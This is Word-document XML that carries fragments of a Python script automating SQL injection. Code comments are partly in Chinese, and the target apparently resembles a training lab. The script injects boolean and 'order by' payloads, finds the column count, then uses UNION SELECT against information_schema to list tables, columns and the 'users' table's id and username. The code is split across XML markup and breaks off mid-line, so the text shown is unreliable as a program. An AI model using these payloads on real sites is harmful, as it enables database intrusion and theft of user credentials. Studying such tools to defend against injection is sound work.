    <w:p w14:paraId="60925D9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target_url2 =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 str(item) + '%20and%201=2%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E594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1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target_url1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2954D62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2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target_url2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9A28A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CD5D5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1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1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7582272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1 = soup1.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D24A92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1 = str(fonts1[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A40F8" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471B30F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2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2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7932BA3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2 = soup2.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EB03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2 = str(fonts2[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A03F7" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7657157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content1.find('Login'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= -1 and content2 is None or content2.strip() == '':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF3E1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Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DB35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turn True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B54F1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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A9152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Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E5309" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E46B7D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检测数值型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC97D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arget_url3 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_</w:t>
      </w:r>
      <w:proofErr w:type="gram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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:-1] + '-1' + '%20%20or%201=1%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659EF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arget_url4 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_</w:t>
      </w:r>
      <w:proofErr w:type="gram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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:-1] + '-1' + '%20%20or%201=2%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B4CE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3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target_url3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD324F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4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target_url4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D33A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oup3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3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73F27EA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3 = soup3.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F0C9D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ntent3 = str(fonts3[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087C37E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oup4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4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2079DAA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4 = soup4.find_all('font')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC73AC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ntent4 = str(fonts4[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26978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content3.find('You'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= -1 and content4 is None or content4.strip() == '':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669092A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Integer Type -&gt; Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355E9E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True, 'integer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA29D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1523F36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Integer Type -&gt; Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E59A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False, None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3602AA05" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4164CD" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC4BDE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test_order_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by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58B7027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lag = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE57E9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00):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22375DE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Order By Test -&gt; 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4119123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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 'integer':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DBEE5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symbol + '%20order%20by%20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--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05545CB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sult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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074FCB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730EFEF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2157724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content = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C85BC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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('Login') == -1 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('You are in') == -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B757B1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Order By Test Success -&gt; order by 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF279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lag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B9EEC0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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2960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1BD336C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'%20order%20by%20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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E96A2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sult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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659934C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418B7AE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1EF604D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content = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24BD0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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('Login') == -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74278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Order By Test Success -&gt; order by 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D678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    flag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71192E5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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E145F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flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9FC66E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728C2E38" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D6066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prefix_url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5BC0017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plits = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('=')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70053BF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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>splits.remove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(splits[-1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D9AD9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= ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4A13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item in splits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09996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= str(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E661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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prefix_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47AEAB29" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E92FF2" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E1078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test_union_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>selec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flag):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB34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get_prefix_url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4759D18B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC8A7D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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC0E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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E152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111DC62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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47388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4D5090F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flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D76D7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%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E439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39C4EDC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52E1A11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ry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECB32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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A114C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79A66EE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00F8994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 = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1C6BF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4967C22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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(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 != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FE6B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792320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return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temp_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E95F79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xcept Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47DC1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print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2DA0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51026A66" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B8A591" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB495B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exec_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functio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, function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDFCEB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get_prefix_url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51092DE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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832A2F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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A3232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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288F40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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0573A6" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B32845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5C0CEB8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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B5858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function + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD01E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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DFC2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%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FF34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2C940B9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468C4BF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4ADC2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45EBCDE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02480B8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ntent = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF6C1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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C11DE90" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7493F3A1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF665F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bas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09B2A5F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symbol + 'hacking___'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595207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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A354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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('MySQL') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA3D9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'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A3D3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34DB8C5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'Cannot get database'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A40799" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C46D8B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAB5C1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database_in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4AF8BC1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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:-1] + '-1' + '%20or%201=2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4354A11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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5987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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('MySQL') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A62F1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'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A8CB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05A4CA8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'Cannot get DBMS'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF98D09" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A44167" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6DC98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table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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA552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get_prefix_url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0E02A4A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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16732D2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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98EC0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14A3390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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFD11B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4395D38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65E17A6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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162275E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'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)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311CB4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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB02AA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%20from%20information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%20where%20table_schema=database()%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61039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7DD27C4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0EF7CA1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311146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5148556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5F026EF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ntent = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69072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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074426D5" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C926DC1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78895DA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column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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBAA8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get_prefix_url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2E29366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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1842C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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C71C8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089DEBC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-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A82B0" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A24748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139729A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2926820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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557188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'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lumn_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)' + ','</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39544ED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i == flag - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7261E54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%20from%20information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%20where%20' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A688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'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=\'users\'%20and%20table_schema=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)%20--+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4D70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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A566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19526B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8367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124E3C7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5E7159E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 = str(fonts[2].text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93864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0])[1].split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1])[0]  #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F933FF0" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F08B47A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C00816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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A728CB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get_prefix_url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578D190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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>symbol.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('%') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06057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0' + symbol + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110DBED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575E1E0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prefix_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + '=-1' + '%20union%20select%20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3FFE3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246C8A8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730AEF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058389A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index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22453B1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'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id,0x3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a,username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
